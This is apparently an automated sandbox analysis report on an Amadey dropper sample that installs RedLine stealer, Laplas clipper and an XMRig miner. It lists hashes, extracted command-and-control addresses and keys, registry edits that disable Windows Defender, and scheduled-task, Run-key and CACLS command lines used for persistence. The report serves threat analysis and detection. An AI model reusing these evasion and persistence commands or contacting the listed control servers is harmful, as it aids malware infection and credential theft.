amadey | 9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4

Analysis

max time kernel
50s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
16-03-2023 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe
Size

656KB
MD5

29c185602b64d9a3f80e4f1b5a1e162b
SHA1

1be55a271bbb580ff8d0739a1da75eca4dd21151
SHA256

9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4
SHA512

29df82cbad656f3e9b0cb4ff79371753e82a20b9552be69b26ddc616fba7a42f045b12c07a173628340774eb633cabd6c7f2fe9214d7c997b24c71252a635406
SSDEEP

12288:bMr4y90VqJeiHyef65ppanwaYPnod2AnXdBKKslsG5tNmYIL+I0SaigsQ:PyGSeOhf6faxRnX/LoNB3

Score

10^/10

amadey laplas redline xmrig @redlinevipchat cloud (tg: @fatherofcarders)lint matywon2 clipper discovery evasion infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

lint

193.233.20.28:4125

Attributes

auth_value
0e95262fb78243c67430f3148303e5b7

Extracted

Family

amadey

Version

3.68

62.204.41.87/joomla/index.php

Extracted

Family

redline

Botnet

@REDLINEVIPCHAT Cloud (TG: @FATHEROFCARDERS)

151.80.89.234:19388

Attributes

auth_value
56af49c3278d982f9a41ef2abb7c4d09

Extracted

Family

redline

Botnet

MatyWon2

85.31.54.216:43728

Attributes

auth_value
abc9e9d7ec3024110589ea03bcfaaa89

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
9ee0ef01cd0f0468c997745b63f39799e510412a4bb4e6ff8efcf6f8ac926172

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas

Modifies Windows Defender Real-time Protection settings 3 TTPs 12 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

ns2742Gm.exepy77UW65.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	ns2742Gm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	ns2742Gm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	py77UW65.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	py77UW65.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	py77UW65.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	ns2742Gm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	ns2742Gm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	ns2742Gm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	ns2742Gm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	py77UW65.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	py77UW65.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	py77UW65.exe

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3196 5012 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3196	5012	rundll32.exe

XMRig Miner payload 4 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3496-513-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	xmrig
behavioral1/memory/3496-519-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	xmrig
behavioral1/memory/3496-522-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	xmrig
behavioral1/memory/3496-523-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	xmrig

Downloads MZ/PE file

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Setupdark.exeserv.exelish.exery12yc25.exelegenda.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	Setupdark.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	serv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	lish.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	ry12yc25.exe
Key value queried	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation	legenda.exe

Executes dropped EXE 17 IoCs

Processes:

will2598.exewill3082.exens2742Gm.exepy77UW65.exeqs1177sF.exery12yc25.exelegenda.exeserv.exeMatyWon.exe10MIL.exeMatyWon.exeMatyWon.exeSetupdark.exeMatyWon.exeMatyWon.exeinstaller.exelish.exe

pid	process
960	will2598.exe
3356	will3082.exe
4432	ns2742Gm.exe
3348	py77UW65.exe
2204	qs1177sF.exe
1880	ry12yc25.exe
1152	legenda.exe
1560	serv.exe
2252	MatyWon.exe
4088	10MIL.exe
760	MatyWon.exe
3768	MatyWon.exe
4548	Setupdark.exe
4160	MatyWon.exe
3936	MatyWon.exe
3444	installer.exe
3736	lish.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe	upx
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe	upx
C:\Users\Admin\AppData\Local\Temp\1000044001\Setupdark.exe	upx
behavioral1/memory/4548-356-0x0000000140000000-0x0000000140042000-memory.dmp	upx
behavioral1/memory/4548-413-0x0000000140000000-0x0000000140042000-memory.dmp	upx
behavioral1/memory/4548-477-0x0000000140000000-0x0000000140042000-memory.dmp	upx
behavioral1/memory/3496-513-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	upx
behavioral1/memory/3496-519-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	upx
behavioral1/memory/3496-522-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	upx
behavioral1/memory/3496-523-0x00007FF7F0990000-0x00007FF7F1184000-memory.dmp	upx

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

ns2742Gm.exepy77UW65.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	ns2742Gm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	py77UW65.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	py77UW65.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exewill2598.exewill3082.exeserv.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	will2598.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	will2598.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	will3082.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	will3082.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe"	serv.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

87 api.ipify.org
88 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

installer.exe

pid process

3444 installer.exe

flow	ioc
87	api.ipify.org
88	api.ipify.org

pid	process
3444	installer.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

MatyWon.exeMatyWon.exe

description	pid	process	target process
PID 2252 set thread context of 3768	2252	MatyWon.exe	MatyWon.exe
PID 760 set thread context of 960	760	MatyWon.exe	MatyWon.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1276 3348 WerFault.exe py77UW65.exe
4208 1872 WerFault.exe rundll32.exe
2268 1560 WerFault.exe serv.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2128 schtasks.exe

pid	pid_target	process	target process
1276	3348	WerFault.exe	py77UW65.exe
4208	1872	WerFault.exe	rundll32.exe
2268	1560	WerFault.exe	serv.exe

pid	process
2128	schtasks.exe

Modifies registry class 36 IoCs

Processes:

lish.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID\ = "{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32\ = "ole32.dll"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS\ = "0"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\ = "sqltest"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\ = "sqltest.Application"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1071A9~1\\lish.exe"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000047001\\lish.exe"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ = "sqltest.Application"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID\ = "sqltest.Application"	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR\	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32	lish.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	lish.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0	lish.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

ns2742Gm.exepy77UW65.exeqs1177sF.exeinstaller.exe

pid process

4432 ns2742Gm.exe
4432 ns2742Gm.exe
3348 py77UW65.exe
3348 py77UW65.exe
2204 qs1177sF.exe
2204 qs1177sF.exe
3444 installer.exe
3444 installer.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

ns2742Gm.exepy77UW65.exeqs1177sF.exe

description pid process

Token: SeDebugPrivilege 4432 ns2742Gm.exe
Token: SeDebugPrivilege 3348 py77UW65.exe
Token: SeDebugPrivilege 2204 qs1177sF.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

lish.exe

pid process

3736 lish.exe
3736 lish.exe

pid	process
4432	ns2742Gm.exe
4432	ns2742Gm.exe
3348	py77UW65.exe
3348	py77UW65.exe
2204	qs1177sF.exe
2204	qs1177sF.exe
3444	installer.exe
3444	installer.exe

description	pid	process
Token: SeDebugPrivilege	4432	ns2742Gm.exe
Token: SeDebugPrivilege	3348	py77UW65.exe
Token: SeDebugPrivilege	2204	qs1177sF.exe

pid	process
3736	lish.exe
3736	lish.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exewill2598.exewill3082.exery12yc25.exelegenda.execmd.exeMatyWon.exeMatyWon.exe

description	pid	process	target process
PID 4412 wrote to memory of 960	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	will2598.exe
PID 4412 wrote to memory of 960	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	will2598.exe
PID 4412 wrote to memory of 960	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	will2598.exe
PID 960 wrote to memory of 3356	960	will2598.exe	will3082.exe
PID 960 wrote to memory of 3356	960	will2598.exe	will3082.exe
PID 960 wrote to memory of 3356	960	will2598.exe	will3082.exe
PID 3356 wrote to memory of 4432	3356	will3082.exe	ns2742Gm.exe
PID 3356 wrote to memory of 4432	3356	will3082.exe	ns2742Gm.exe
PID 3356 wrote to memory of 3348	3356	will3082.exe	py77UW65.exe
PID 3356 wrote to memory of 3348	3356	will3082.exe	py77UW65.exe
PID 3356 wrote to memory of 3348	3356	will3082.exe	py77UW65.exe
PID 960 wrote to memory of 2204	960	will2598.exe	qs1177sF.exe
PID 960 wrote to memory of 2204	960	will2598.exe	qs1177sF.exe
PID 960 wrote to memory of 2204	960	will2598.exe	qs1177sF.exe
PID 4412 wrote to memory of 1880	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	ry12yc25.exe
PID 4412 wrote to memory of 1880	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	ry12yc25.exe
PID 4412 wrote to memory of 1880	4412	9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe	ry12yc25.exe
PID 1880 wrote to memory of 1152	1880	ry12yc25.exe	legenda.exe
PID 1880 wrote to memory of 1152	1880	ry12yc25.exe	legenda.exe
PID 1880 wrote to memory of 1152	1880	ry12yc25.exe	legenda.exe
PID 1152 wrote to memory of 2128	1152	legenda.exe	schtasks.exe
PID 1152 wrote to memory of 2128	1152	legenda.exe	schtasks.exe
PID 1152 wrote to memory of 2128	1152	legenda.exe	schtasks.exe
PID 1152 wrote to memory of 5064	1152	legenda.exe	cmd.exe
PID 1152 wrote to memory of 5064	1152	legenda.exe	cmd.exe
PID 1152 wrote to memory of 5064	1152	legenda.exe	cmd.exe
PID 5064 wrote to memory of 1404	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 1404	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 1404	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 4972	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4972	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4972	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4956	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4956	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4956	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 1288	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 1288	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 1288	5064	cmd.exe	cmd.exe
PID 5064 wrote to memory of 4252	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4252	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 4252	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 3052	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 3052	5064	cmd.exe	cacls.exe
PID 5064 wrote to memory of 3052	5064	cmd.exe	cacls.exe
PID 1152 wrote to memory of 1560	1152	legenda.exe	serv.exe
PID 1152 wrote to memory of 1560	1152	legenda.exe	serv.exe
PID 1152 wrote to memory of 1560	1152	legenda.exe	serv.exe
PID 1152 wrote to memory of 2252	1152	legenda.exe	MatyWon.exe
PID 1152 wrote to memory of 2252	1152	legenda.exe	MatyWon.exe
PID 1152 wrote to memory of 2252	1152	legenda.exe	MatyWon.exe
PID 2252 wrote to memory of 3768	2252	MatyWon.exe	MatyWon.exe
PID 2252 wrote to memory of 3768	2252	MatyWon.exe	MatyWon.exe
PID 2252 wrote to memory of 3768	2252	MatyWon.exe	MatyWon.exe
PID 1152 wrote to memory of 4088	1152	legenda.exe	10MIL.exe
PID 1152 wrote to memory of 4088	1152	legenda.exe	10MIL.exe
PID 1152 wrote to memory of 4088	1152	legenda.exe	10MIL.exe
PID 1152 wrote to memory of 760	1152	legenda.exe	MatyWon.exe
PID 1152 wrote to memory of 760	1152	legenda.exe	MatyWon.exe
PID 1152 wrote to memory of 760	1152	legenda.exe	MatyWon.exe
PID 760 wrote to memory of 3936	760	MatyWon.exe	MatyWon.exe
PID 760 wrote to memory of 3936	760	MatyWon.exe	MatyWon.exe
PID 760 wrote to memory of 3936	760	MatyWon.exe	MatyWon.exe
PID 2252 wrote to memory of 3768	2252	MatyWon.exe	MatyWon.exe
PID 2252 wrote to memory of 3768	2252	MatyWon.exe	MatyWon.exe

C:\Users\Admin\AppData\Local\Temp\9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe
"C:\Users\Admin\AppData\Local\Temp\9951276c5be2e703f966332237ee6a01d3b1697ae6f71ed7d2f1e98edd136ae4.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4412

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2598.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\will2598.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:960

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3082.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\will3082.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3356

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2742Gm.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ns2742Gm.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py77UW65.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\py77UW65.exe
4⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1016
5⤵
- Program crash
PID:1276

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs1177sF.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\qs1177sF.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry12yc25.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ry12yc25.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1880

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F
4⤵
- Creates scheduled task(s)
PID:2128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit
4⤵
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1404

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:N"
5⤵
PID:4972

C:\Windows\SysWOW64\cacls.exe
CACLS "legenda.exe" /P "Admin:R" /E
5⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:N"
5⤵
PID:4252

C:\Windows\SysWOW64\cacls.exe
CACLS "..\f22b669919" /P "Admin:R" /E
5⤵
PID:3052

C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe
"C:\Users\Admin\AppData\Local\Temp\1000026001\serv.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:1560

C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
5⤵
PID:980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 1212
5⤵
- Program crash
PID:2268

C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
"C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2252

C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
C:\Users\Admin\AppData\Local\Temp\1000027001\MatyWon.exe
5⤵
- Executes dropped EXE
PID:3768

C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe
"C:\Users\Admin\AppData\Local\Temp\1000041001\10MIL.exe"
4⤵
- Executes dropped EXE
PID:4088

C:\Users\Admin\AppData\Local\Temp\1000042001\MatyWon.exe
